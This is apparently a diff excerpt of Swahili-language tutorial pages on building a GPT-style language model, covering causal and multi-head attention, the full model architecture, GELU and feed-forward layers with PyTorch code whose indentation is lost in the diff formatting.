		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
keys = self.W_key(x)
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
attn_scores = queries @ keys.T
 | 
			
		||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 | 
			
		||||
 | 
			
		||||
context_vec = attn_weights @ values
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
d_in=3
 | 
			
		||||
d_out=2
 | 
			
		||||
torch.manual_seed(789)
 | 
			
		||||
sa_v2 = SelfAttention_v2(d_in, d_out)
 | 
			
		||||
print(sa_v2(inputs))
 | 
			
		||||
```
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Kumbuka kwamba badala ya kuanzisha matrices na thamani za nasibu, `nn.Linear` inatumika kuashiria uzito wote kama vigezo vya kufundisha.
 | 
			
		||||
 | 
			
		||||
## Causal Attention: Kuficha Maneno ya Baadaye
 | 
			
		||||
 | 
			
		||||
Kwa LLMs tunataka mfano uzingatie tu tokens ambazo zinaonekana kabla ya nafasi ya sasa ili **kutabiri token inayofuata**. **Causal attention**, pia inajulikana kama **masked attention**, inafanikiwa kwa kubadilisha mekanizma ya attention ili kuzuia ufikiaji wa tokens za baadaye.
 | 
			
		||||
 | 
			
		||||
### Kutumia Mask ya Causal Attention
 | 
			
		||||
 | 
			
		||||
Ili kutekeleza causal attention, tunatumia mask kwa alama za attention **kabla ya operesheni ya softmax** ili zile zilizobaki bado zikusanye 1. Mask hii inaweka alama za attention za tokens za baadaye kuwa negative infinity, kuhakikisha kwamba baada ya softmax, uzito wao wa attention ni sifuri.
 | 
			
		||||
 | 
			
		||||
**Hatua**
 | 
			
		||||
 | 
			
		||||
1. **Hesabu Alama za Attention**: Kama ilivyokuwa hapo awali.
 | 
			
		||||
2. **Tumia Mask**: Tumia matrix ya juu ya pembeni iliyojaa negative infinity juu ya diagonal.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
mask = torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)  # True above the diagonal (future tokens)
 | 
			
		||||
masked_scores = attention_scores.masked_fill(mask, float('-inf'))  # future positions become -inf
 | 
			
		||||
```
 | 
			
		||||
 | 
			
		||||
3. **Tumia Softmax**: Hesabu uzito wa attention kwa kutumia alama zilizofichwa.
 | 
			
		||||
 | 
			
		||||
```python
 | 
			
		||||
attention_weights = torch.softmax(masked_scores, dim=-1)
 | 
			
		||||
```
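A compact, runnable sketch tying the three steps together (the `attention_scores` here are random stand-in values, just to show the effect of the mask):

```python
import torch

seq_len = 4
attention_scores = torch.rand(seq_len, seq_len)  # stand-in scores for illustration

mask = torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)
masked_scores = attention_scores.masked_fill(mask, float('-inf'))
attention_weights = torch.softmax(masked_scores, dim=-1)
print(attention_weights)  # entries above the diagonal are 0: no attention to future tokens
```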
 | 
			
		||||
 | 
			
		||||
### Kuficha Uzito wa Ziada wa Attention kwa Kutumia Dropout
 | 
			
		||||
 | 
			
		||||
Ili **kuzuia overfitting**, tunaweza kutumia **dropout** kwa uzito wa attention baada ya operesheni ya softmax. Dropout **hufanya baadhi ya uzito wa attention kuwa sifuri kwa nasibu** wakati wa mafunzo.
 | 
			
		||||
```python
 | 
			
		||||
dropout = nn.Dropout(p=0.5)
 | 
			
		||||
attention_weights = dropout(attention_weights)
 | 
			
		||||
```
 | 
			
		||||
Kawaida ya kuacha ni takriban 10-20%.
 | 
			
		||||
 | 
			
		||||
### Mfano wa Code
 | 
			
		||||
 | 
			
		||||
Mfano wa code kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
 | 
			
		||||
inputs = torch.tensor(
 | 
			
		||||
[[0.43, 0.15, 0.89], # Your     (x^1)
 | 
			
		||||
[0.55, 0.87, 0.66], # journey  (x^2)
 | 
			
		||||
[0.57, 0.85, 0.64], # starts   (x^3)
 | 
			
		||||
[0.22, 0.58, 0.33], # with     (x^4)
 | 
			
		||||
[0.77, 0.25, 0.10], # one      (x^5)
 | 
			
		||||
[0.05, 0.80, 0.55]] # step     (x^6)
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
batch = torch.stack((inputs, inputs), dim=0)
 | 
			
		||||
print(batch.shape)
 | 
			
		||||
 | 
			
		||||
class CausalAttention(nn.Module):
 | 
			
		||||
 | 
			
		||||
def __init__(self, d_in, d_out, context_length,
 | 
			
		||||
dropout, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.d_out = d_out
 | 
			
		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key   = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.dropout = nn.Dropout(dropout)
 | 
			
		||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
b, num_tokens, d_in = x.shape
 | 
			
		||||
# b is the num of batches
 | 
			
		||||
# num_tokens is the number of tokens per batch
 | 
			
		||||
# d_in is the number of dimensions per token
 | 
			
		||||
 | 
			
		||||
keys = self.W_key(x) # This generates the keys of the tokens
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
 | 
			
		||||
attn_scores.masked_fill_(  # New, _ ops are in-place
 | 
			
		||||
self.mask.bool()[:num_tokens, :num_tokens], -torch.inf)  # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
 | 
			
		||||
attn_weights = torch.softmax(
 | 
			
		||||
attn_scores / keys.shape[-1]**0.5, dim=-1
 | 
			
		||||
)
 | 
			
		||||
attn_weights = self.dropout(attn_weights)
 | 
			
		||||
 | 
			
		||||
context_vec = attn_weights @ values
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
 | 
			
		||||
context_length = batch.shape[1]
 | 
			
		||||
d_in = 3
 | 
			
		||||
d_out = 2
 | 
			
		||||
ca = CausalAttention(d_in, d_out, context_length, 0.0)
 | 
			
		||||
 | 
			
		||||
context_vecs = ca(batch)
 | 
			
		||||
 | 
			
		||||
print(context_vecs)
 | 
			
		||||
print("context_vecs.shape:", context_vecs.shape)
 | 
			
		||||
```
 | 
			
		||||
## Kuongeza Umakini wa Kichwa Kimoja hadi Umakini wa Vichwa Vingi
 | 
			
		||||
 | 
			
		||||
**Umakini wa vichwa vingi** kwa vitendo unajumuisha kutekeleza **matukio mengi** ya kazi ya umakini wa ndani, kila moja ikiwa na **uzito wake mwenyewe**, ili vektori tofauti za mwisho zihesabiwe.
 | 
			
		||||
 | 
			
		||||
### Mfano wa Kanuni
 | 
			
		||||
 | 
			
		||||
Ingewezekana kutumia tena kanuni ya awali na kuongeza tu kifuniko kinachoizindua mara kadhaa, lakini hii ni toleo lililoimarishwa zaidi kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) linaloshughulikia vichwa vyote kwa wakati mmoja (kupunguza idadi ya mizunguko ya gharama kubwa). Kama unavyoona katika kanuni, vipimo vya kila token vinagawanywa katika vipimo tofauti kulingana na idadi ya vichwa. Kwa njia hii, ikiwa token ina vipimo 8 na tunataka kutumia vichwa 2, vipimo vitagawanywa katika arrays 2 za vipimo 4 na kila kichwa kitatumia moja yao:
 | 
			
		||||
```python
 | 
			
		||||
class MultiHeadAttention(nn.Module):
 | 
			
		||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
		||||
assert (d_out % num_heads == 0), \
 | 
			
		||||
"d_out must be divisible by num_heads"
 | 
			
		||||
 | 
			
		||||
self.d_out = d_out
 | 
			
		||||
self.num_heads = num_heads
 | 
			
		||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
 | 
			
		||||
 | 
			
		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
 | 
			
		||||
self.dropout = nn.Dropout(dropout)
 | 
			
		||||
self.register_buffer(
 | 
			
		||||
"mask",
 | 
			
		||||
torch.triu(torch.ones(context_length, context_length),
 | 
			
		||||
diagonal=1)
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
b, num_tokens, d_in = x.shape
 | 
			
		||||
# b is the num of batches
 | 
			
		||||
# num_tokens is the number of tokens per batch
 | 
			
		||||
# d_in is the number of dimensions per token
 | 
			
		||||
 | 
			
		||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
# We implicitly split the matrix by adding a `num_heads` dimension
 | 
			
		||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
 | 
			
		||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
 | 
			
		||||
keys = keys.transpose(1, 2)
 | 
			
		||||
queries = queries.transpose(1, 2)
 | 
			
		||||
values = values.transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
 | 
			
		||||
attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
 | 
			
		||||
 | 
			
		||||
# Original mask truncated to the number of tokens and converted to boolean
 | 
			
		||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
 | 
			
		||||
 | 
			
		||||
# Use the mask to fill attention scores
 | 
			
		||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
 | 
			
		||||
 | 
			
		||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 | 
			
		||||
attn_weights = self.dropout(attn_weights)
 | 
			
		||||
 | 
			
		||||
# Shape: (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
context_vec = (attn_weights @ values).transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
 | 
			
		||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
 | 
			
		||||
context_vec = self.out_proj(context_vec) # optional projection
 | 
			
		||||
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
 | 
			
		||||
batch_size, context_length, d_in = batch.shape
 | 
			
		||||
d_out = 2
 | 
			
		||||
mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2)
 | 
			
		||||
 | 
			
		||||
context_vecs = mha(batch)
 | 
			
		||||
 | 
			
		||||
print(context_vecs)
 | 
			
		||||
print("context_vecs.shape:", context_vecs.shape)
 | 
			
		||||
 | 
			
		||||
```
 | 
			
		||||
Kwa utekelezaji mwingine wa kompakt na mzuri unaweza kutumia darasa la [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) katika PyTorch.
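As a rough sketch (not from the book) of how the built-in class could cover the same causal, batch-first setup, using only documented arguments of `torch.nn.MultiheadAttention`; the sizes here are illustrative:

```python
import torch
import torch.nn as nn

d_model, num_heads, seq_len = 8, 2, 4
mha = nn.MultiheadAttention(embed_dim=d_model, num_heads=num_heads, batch_first=True)

x = torch.rand(1, seq_len, d_model)  # (batch, tokens, embed_dim)
# Boolean causal mask: True marks positions that must NOT be attended to (future tokens)
causal_mask = torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)

out, attn_weights = mha(x, x, x, attn_mask=causal_mask)  # self-attention: query = key = value
print(out.shape)  # torch.Size([1, 4, 8])
```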
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Jibu fupi la ChatGPT kuhusu kwa nini ni bora kugawanya vipimo vya tokens kati ya vichwa badala ya kuwa na kila kichwa kinachunguza vipimo vyote vya tokens zote:
 | 
			
		||||
>
 | 
			
		||||
> Ingawa kuruhusu kila kichwa kushughulikia vipimo vyote vya embedding kunaweza kuonekana kuwa na faida kwa sababu kila kichwa kitakuwa na ufikiaji wa taarifa kamili, mazoea ya kawaida ni **kugawanya vipimo vya embedding kati ya vichwa**. Njia hii inalinganisha ufanisi wa kompyuta na utendaji wa mfano na inahimiza kila kichwa kujifunza uwakilishi tofauti. Hivyo basi, kugawanya vipimo vya embedding kwa ujumla kunapewa kipaumbele kuliko kuwa na kila kichwa kinachunguza vipimo vyote.
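A tiny sketch of that dimension split (the numbers match the 8-dimension / 2-head example mentioned earlier; the `view`/`transpose` calls mirror what the `MultiHeadAttention` class above does internally):

```python
import torch

b, num_tokens, d_out, num_heads = 1, 4, 8, 2
head_dim = d_out // num_heads                     # 4 dimensions per head

x = torch.rand(b, num_tokens, d_out)
heads = x.view(b, num_tokens, num_heads, head_dim).transpose(1, 2)
print(heads.shape)  # torch.Size([1, 2, 4, 4]) -> each head only sees 4 of the 8 dimensions
```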
 | 
			
		||||
 | 
			
		||||
## References
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,666 +0,0 @@
 | 
			
		||||
# 5. LLM Architecture
 | 
			
		||||
 | 
			
		||||
## LLM Architecture
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la hatua hii ya tano ni rahisi sana: **Kuunda usanifu wa LLM kamili**. Panga kila kitu pamoja, tumia tabaka zote na uunde kazi zote za kuzalisha maandiko au kubadilisha maandiko kuwa IDs na kinyume chake.
 | 
			
		||||
>
 | 
			
		||||
> Usanifu huu utatumika kwa mafunzo na kutabiri maandiko baada ya kufundishwa.
 | 
			
		||||
 | 
			
		||||
Mfano wa usanifu wa LLM kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
 | 
			
		||||
 | 
			
		||||
Uwakilishi wa kiwango cha juu unaweza kuonekana katika:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
1. **Input (Tokenized Text)**: Mchakato huanza na maandiko yaliyotolewa token, ambayo yanabadilishwa kuwa uwakilishi wa nambari.
 | 
			
		||||
2. **Token Embedding and Positional Embedding Layer**: Maandiko yaliyotolewa token yanapita kupitia **token embedding** layer na **positional embedding layer**, ambayo inashika nafasi ya tokens katika mfuatano, muhimu kwa kuelewa mpangilio wa maneno.
 | 
			
		||||
3. **Transformer Blocks**: Mfano una **12 transformer blocks**, kila moja ikiwa na tabaka nyingi. Blocks hizi hurudia mfuatano ufuatao:
 | 
			
		||||
- **Masked Multi-Head Attention**: Inaruhusu mfano kuzingatia sehemu tofauti za maandiko ya ingizo kwa wakati mmoja.
 | 
			
		||||
- **Layer Normalization**: Hatua ya kawaida ili kuimarisha na kuboresha mafunzo.
 | 
			
		||||
- **Feed Forward Layer**: Inawajibika kwa kuchakata habari kutoka kwa tabaka la umakini na kufanya utabiri kuhusu token inayofuata.
 | 
			
		||||
- **Dropout Layers**: Tabaka hizi zinazuia overfitting kwa kuacha vitengo kwa bahati nasibu wakati wa mafunzo.
 | 
			
		||||
4. **Final Output Layer**: Mfano unatoa **4x50,257-dimensional tensor**, ambapo **50,257** inawakilisha ukubwa wa msamiati. Kila safu katika tensor hii inahusiana na vector ambayo mfano hutumia kutabiri neno linalofuata katika mfuatano.
 | 
			
		||||
5. **Goal**: Lengo ni kuchukua embeddings hizi na kuzibadilisha tena kuwa maandiko. Kwa haswa, safu ya mwisho ya pato inatumika kuzalisha neno linalofuata, linalowakilishwa kama "forward" katika mchoro huu.
 | 
			
		||||
 | 
			
		||||
### Code representation
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
import tiktoken
 | 
			
		||||
 | 
			
		||||
class GELU(nn.Module):
 | 
			
		||||
def __init__(self):
 | 
			
		||||
super().__init__()
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
return 0.5 * x * (1 + torch.tanh(
 | 
			
		||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
 | 
			
		||||
(x + 0.044715 * torch.pow(x, 3))
 | 
			
		||||
))
 | 
			
		||||
 | 
			
		||||
class FeedForward(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.layers = nn.Sequential(
 | 
			
		||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
 | 
			
		||||
GELU(),
 | 
			
		||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
return self.layers(x)
 | 
			
		||||
 | 
			
		||||
class MultiHeadAttention(nn.Module):
 | 
			
		||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
		||||
assert d_out % num_heads == 0, "d_out must be divisible by num_heads"
 | 
			
		||||
 | 
			
		||||
self.d_out = d_out
 | 
			
		||||
self.num_heads = num_heads
 | 
			
		||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
 | 
			
		||||
 | 
			
		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
 | 
			
		||||
self.dropout = nn.Dropout(dropout)
 | 
			
		||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
b, num_tokens, d_in = x.shape
 | 
			
		||||
 | 
			
		||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
# We implicitly split the matrix by adding a `num_heads` dimension
 | 
			
		||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
 | 
			
		||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
 | 
			
		||||
keys = keys.transpose(1, 2)
 | 
			
		||||
queries = queries.transpose(1, 2)
 | 
			
		||||
values = values.transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
 | 
			
		||||
attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
 | 
			
		||||
 | 
			
		||||
# Original mask truncated to the number of tokens and converted to boolean
 | 
			
		||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
 | 
			
		||||
 | 
			
		||||
# Use the mask to fill attention scores
 | 
			
		||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
 | 
			
		||||
 | 
			
		||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 | 
			
		||||
attn_weights = self.dropout(attn_weights)
 | 
			
		||||
 | 
			
		||||
# Shape: (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
context_vec = (attn_weights @ values).transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
 | 
			
		||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
 | 
			
		||||
context_vec = self.out_proj(context_vec) # optional projection
 | 
			
		||||
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
class LayerNorm(nn.Module):
 | 
			
		||||
def __init__(self, emb_dim):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.eps = 1e-5
 | 
			
		||||
self.scale = nn.Parameter(torch.ones(emb_dim))
 | 
			
		||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
mean = x.mean(dim=-1, keepdim=True)
 | 
			
		||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
 | 
			
		||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
 | 
			
		||||
return self.scale * norm_x + self.shift
 | 
			
		||||
 | 
			
		||||
class TransformerBlock(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.att = MultiHeadAttention(
 | 
			
		||||
d_in=cfg["emb_dim"],
 | 
			
		||||
d_out=cfg["emb_dim"],
 | 
			
		||||
context_length=cfg["context_length"],
 | 
			
		||||
num_heads=cfg["n_heads"],
 | 
			
		||||
dropout=cfg["drop_rate"],
 | 
			
		||||
qkv_bias=cfg["qkv_bias"])
 | 
			
		||||
self.ff = FeedForward(cfg)
 | 
			
		||||
self.norm1 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.norm2 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
# Shortcut connection for attention block
 | 
			
		||||
shortcut = x
 | 
			
		||||
x = self.norm1(x)
 | 
			
		||||
x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
 | 
			
		||||
x = self.drop_shortcut(x)
 | 
			
		||||
x = x + shortcut  # Add the original input back
 | 
			
		||||
 | 
			
		||||
# Shortcut connection for feed forward block
 | 
			
		||||
shortcut = x
 | 
			
		||||
x = self.norm2(x)
 | 
			
		||||
x = self.ff(x)
 | 
			
		||||
x = self.drop_shortcut(x)
 | 
			
		||||
x = x + shortcut  # Add the original input back
 | 
			
		||||
 | 
			
		||||
return x
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class GPTModel(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
 | 
			
		||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
 | 
			
		||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
self.trf_blocks = nn.Sequential(
 | 
			
		||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
 | 
			
		||||
 | 
			
		||||
self.final_norm = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.out_head = nn.Linear(
 | 
			
		||||
cfg["emb_dim"], cfg["vocab_size"], bias=False
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, in_idx):
 | 
			
		||||
batch_size, seq_len = in_idx.shape
 | 
			
		||||
tok_embeds = self.tok_emb(in_idx)
 | 
			
		||||
pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
 | 
			
		||||
x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
 | 
			
		||||
x = self.drop_emb(x)
 | 
			
		||||
x = self.trf_blocks(x)
 | 
			
		||||
x = self.final_norm(x)
 | 
			
		||||
logits = self.out_head(x)
 | 
			
		||||
return logits
 | 
			
		||||
 | 
			
		||||
GPT_CONFIG_124M = {
 | 
			
		||||
"vocab_size": 50257,    # Vocabulary size
 | 
			
		||||
"context_length": 1024, # Context length
 | 
			
		||||
"emb_dim": 768,         # Embedding dimension
 | 
			
		||||
"n_heads": 12,          # Number of attention heads
 | 
			
		||||
"n_layers": 12,         # Number of layers
 | 
			
		||||
"drop_rate": 0.1,       # Dropout rate
 | 
			
		||||
"qkv_bias": False       # Query-Key-Value bias
 | 
			
		||||
}
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
out = model(batch)
 | 
			
		||||
print("Input batch:\n", batch)
 | 
			
		||||
print("\nOutput shape:", out.shape)
 | 
			
		||||
print(out)
 | 
			
		||||
```
 | 
			
		||||
### **Kazi ya Kuamsha ya GELU**
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class GELU(nn.Module):
 | 
			
		||||
def __init__(self):
 | 
			
		||||
super().__init__()
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
return 0.5 * x * (1 + torch.tanh(
 | 
			
		||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
 | 
			
		||||
(x + 0.044715 * torch.pow(x, 3))
 | 
			
		||||
))
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **GELU (Gaussian Error Linear Unit):** Kazi ya kuamsha inayoongeza kutokuwa na mstari katika mfano.
 | 
			
		||||
- **Kuamsha kwa Ufanisi:** Tofauti na ReLU, ambayo inafuta maingizo hasi, GELU inachora kwa laini maingizo kuwa matokeo, ikiruhusu thamani ndogo, zisizo sifuri kwa maingizo hasi.
 | 
			
		||||
- **Mwelekeo wa Kihesabu:**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Lengo la matumizi ya kazi hii baada ya tabaka za mstari ndani ya tabaka la FeedForward ni kubadilisha data za mstari kuwa zisizo za mstari ili kuruhusu mfano kujifunza uhusiano tata, zisizo za mstari.
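A minimal check (assuming the `GELU` class defined above) showing that, unlike ReLU, GELU keeps small non-zero outputs for negative inputs:

```python
import torch
import torch.nn as nn

x = torch.tensor([-3.0, -1.0, 0.0, 1.0, 3.0])
print(GELU()(x))     # smooth curve: e.g. approximately -0.1588 at x = -1, negatives are not zeroed out
print(nn.ReLU()(x))  # hard cut-off: every negative input becomes exactly 0
```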
 | 
			
		||||
 | 
			
		||||
### **Mtandao wa Neva wa FeedForward**
 | 
			
		||||
 | 
			
		||||
_Mifano imeongezwa kama maoni ili kuelewa vyema mifano ya matrices:_
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class FeedForward(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.layers = nn.Sequential(
 | 
			
		||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
 | 
			
		||||
GELU(),
 | 
			
		||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
# x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim)
 | 
			
		||||
x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim)
 | 
			
		||||
x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
return x  # Output shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
